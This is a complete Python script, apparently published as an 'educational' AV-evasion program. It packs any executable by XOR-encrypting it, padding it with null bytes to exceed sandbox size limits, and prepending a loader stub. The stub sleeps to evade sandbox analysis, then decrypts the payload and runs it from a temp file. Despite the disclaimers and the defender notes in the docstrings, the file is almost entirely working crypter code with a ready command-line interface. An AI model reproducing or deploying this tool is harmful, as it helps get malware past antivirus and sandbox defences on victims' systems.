#!/usr/bin/env python3
"""
evasion.py — HiddenBytes Evasion Program
=========================================
Educational tool for understanding binary obfuscation and AV evasion techniques.

DISCLAIMER: This tool is strictly for educational purposes in authorized,
isolated lab environments. Unauthorized use is illegal and unethical.

Author: HiddenBytes Project
Purpose: Demonstrate how attackers modify binaries to evade detection —
         so defenders can build better detection systems.
"""

import argparse
import os
import sys
import time
import struct
import random
import hashlib
import logging
from pathlib import Path

# ─── Logging Setup ───────────────────────────────────────────────────────────
logging.basicConfig(
    level=logging.INFO,
    format="[%(levelname)s] %(message)s"
)
log = logging.getLogger("evasion")


# ─── XOR Encryption ──────────────────────────────────────────────────────────

def generate_key(length: int = 32) -> bytes:
    """
    Generate a random XOR key.

    WHY XOR?
    XOR is symmetric (encrypt == decrypt), fast, and commonly used in
    real-world malware as a first layer of obfuscation. It breaks static
    signature matching because the encrypted bytes look like random noise.
    A defender building a YARA rule, for example, cannot match on the
    original byte sequence once XOR is applied.

    Args:
        length: Key length in bytes (default 32 for decent entropy).

    Returns:
        A random bytes object of the given length.
    """
    return bytes(random.randint(0, 255) for _ in range(length))


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """
    XOR-encrypt (or decrypt — same operation) a byte sequence.

    The key is cycled using modulo so it works on data of any length.
    This mirrors the rolling-XOR technique seen in commodity malware loaders.

    Args:
        data: Raw bytes to encrypt.
        key:  XOR key bytes.

    Returns:
        Encrypted/decrypted bytes.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# ─── File Size Manipulation ───────────────────────────────────────────────────

def pad_binary(data: bytes, target_mb: int) -> bytes:
    """
    Inflate binary size with null-byte padding to reach target_mb.

    WHY SIZE MANIPULATION?
    Many AV sandboxes and automated scanners skip files above a threshold
    (commonly 50–100 MB) because executing them would consume too many
    resources. Attackers abuse this heuristic to bypass cloud-based sandboxes.

    Understanding this helps defenders:
    - Set appropriate file-size caps in policies
    - Flag unusually large executables in EDR telemetry
    - Alert on binaries with large zero-byte regions (entropy analysis)

    Args:
        data:      Original encrypted binary bytes.
        target_mb: Desired final file size in megabytes.

    Returns:
        Padded byte sequence.
    """
    target_bytes = target_mb * 1024 * 1024
    current_size = len(data)

    if current_size >= target_bytes:
        log.warning(
            f"Binary already {current_size / (1024*1024):.1f} MB; "
            "no padding needed."
        )
        return data

    padding = b"\x00" * (target_bytes - current_size)
    log.info(
        f"Padding binary from {current_size / (1024*1024):.1f} MB "
        f"→ {target_mb} MB"
    )
    return data + padding


# ─── Stub Generator ──────────────────────────────────────────────────────────

def build_loader_stub(key: bytes, delay: int, original_hash: str) -> str:
    """
    Generate a Python loader stub that decrypts and executes the payload.

    WHY A LOADER STUB?
    Real malware uses a small, clean 'stub' loader whose job is purely to
    decrypt and run the actual payload in memory. The loader itself has no
    malicious signatures — the payload never touches disk in decrypted form.

    This educational stub writes to a temp file for simplicity. A production
    attacker would use reflective loading (running directly from memory),
    which is far harder to detect. Understanding stubs helps defenders:
    - Write behavioral rules (process spawning from unusual parents)
    - Detect decrypt-and-execute patterns in memory forensics
    - Identify sleep/delay artifacts in sandbox reports

    Args:
        key:           XOR key (encoded as hex string in the stub).
        delay:         Execution delay in seconds.
        original_hash: SHA-256 of the original binary for integrity check.

    Returns:
        Python source code string for the loader stub.
    """
    key_hex = key.hex()
    stub = f'''#!/usr/bin/env python3
"""
HiddenBytes Loader Stub — EDUCATIONAL USE ONLY
Generated by evasion.py. Do NOT use outside an isolated lab.
"""
import time, os, sys, hashlib, tempfile, subprocess

KEY = bytes.fromhex("{key_hex}")
DELAY = {delay}
EXPECTED_HASH = "{original_hash}"

def xor_decrypt(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def main():
    exe_path = os.path.abspath(sys.argv[0])
    with open(exe_path, "rb") as f:
        raw = f.read()

    # ── Execution delay (sandbox evasion heuristic) ──
    print(f"[INFO] Execution delayed by {{DELAY}} seconds...")
    time.sleep(DELAY)

    # ── Strip loader stub prefix to isolate encrypted payload ──
    marker = b"##PAYLOAD_START##"
    idx = raw.find(marker)
    if idx == -1:
        print("[ERROR] Payload marker not found. Aborting.")
        sys.exit(1)
    encrypted_payload = raw[idx + len(marker):]

    # ── Decrypt ──
    decrypted = xor_decrypt(encrypted_payload, KEY)
    print("[INFO] Binary decrypted successfully.")

    # ── Integrity check ──
    digest = hashlib.sha256(decrypted).hexdigest()
    if digest != EXPECTED_HASH:
        print("[ERROR] Integrity check failed. Binary may be tampered.")
        sys.exit(1)

    # ── Write to temp and execute ──
    with tempfile.NamedTemporaryFile(delete=False, suffix=".exe") as tmp:
        tmp.write(decrypted)
        tmp_path = tmp.name
    os.chmod(tmp_path, 0o755)
    print("[INFO] Target program executed.")
    subprocess.run([tmp_path], check=False)
    os.unlink(tmp_path)

if __name__ == "__main__":
    main()
'''
    return stub


# ─── Core Encrypt Routine ─────────────────────────────────────────────────────

def encrypt_binary(
    target_path: str,
    output_path: str,
    size_mb: int,
    delay: int
) -> None:
    """
    Main encryption pipeline: read → hash → XOR encrypt → pad → prepend stub.

    Pipeline overview:
        1. Read original binary
        2. SHA-256 hash (integrity check for the stub)
        3. XOR encrypt with random key
        4. Optionally pad to target_mb
        5. Prepend Python loader stub + PAYLOAD_START marker
        6. Write final output

    Args:
        target_path: Path to the original executable to encrypt.
        output_path: Destination path for the obfuscated binary.
        size_mb:     Target file size in MB (0 = no padding).
        delay:       Execution delay in seconds embedded in the stub.
    """
    target = Path(target_path)
    if not target.exists():
        log.error(f"Target binary not found: {target_path}")
        sys.exit(1)

    log.info(f"Reading target binary: {target_path}")
    original_data = target.read_bytes()

    # Integrity fingerprint
    original_hash = hashlib.sha256(original_data).hexdigest()
    log.info(f"SHA-256 of original: {original_hash[:16]}...")

    # Encrypt
    key = generate_key(32)
    log.info(f"Encrypting with XOR key (first 8 bytes): {key[:8].hex()}")
    encrypted = xor_encrypt(original_data, key)

    # Pad if requested
    if size_mb > 0:
        encrypted = pad_binary(encrypted, size_mb)

    # Build loader stub
    stub_code = build_loader_stub(key, delay, original_hash)
    stub_bytes = stub_code.encode("utf-8")
    marker = b"##PAYLOAD_START##"

    # Combine: stub + marker + encrypted payload
    final_bytes = stub_bytes + marker + encrypted

    output = Path(output_path)
    output.write_bytes(final_bytes)

    log.info(f"Encryption successful!")
    log.info(f"Encrypted binary saved as: {output_path}")
    log.info(f"Final size: {len(final_bytes) / (1024*1024):.2f} MB")
    log.info(f"Execution delay embedded: {delay}s")


# ─── CLI ──────────────────────────────────────────────────────────────────────

def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(
        prog="evasion",
        description=(
            "HiddenBytes Evasion Program — Educational binary obfuscation tool.\n"
            "DISCLAIMER: For authorized, isolated lab environments only."
        ),
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  evasion --encrypt target.exe --output obfuscated.exe --add-size 101 --delay 101
  evasion --encrypt payload.bin --output stealthy.bin --delay 30
        """
    )
    parser.add_argument(
        "--encrypt",
        metavar="<target-binary>",
        help="Path to the target binary to encrypt."
    )
    parser.add_argument(
        "--output",
        metavar="<output-binary>",
        default="obfuscated.exe",
        help="Output file name for the encrypted binary (default: obfuscated.exe)."
    )
    parser.add_argument(
        "--add-size",
        metavar="<size-in-mb>",
        type=int,
        default=0,
        help="Inflate binary to this size in MB (default: no inflation)."
    )
    parser.add_argument(
        "--delay",
        metavar="<seconds>",
        type=int,
        default=101,
        help="Execution delay in seconds before payload runs (default: 101)."
    )
    return parser


def main():
    parser = build_parser()
    args = parser.parse_args()

    if not args.encrypt:
        parser.print_help()
        sys.exit(0)

    encrypt_binary(
        target_path=args.encrypt,
        output_path=args.output,
        size_mb=args.add_size,
        delay=args.delay
    )


if __name__ == "__main__":
    main()
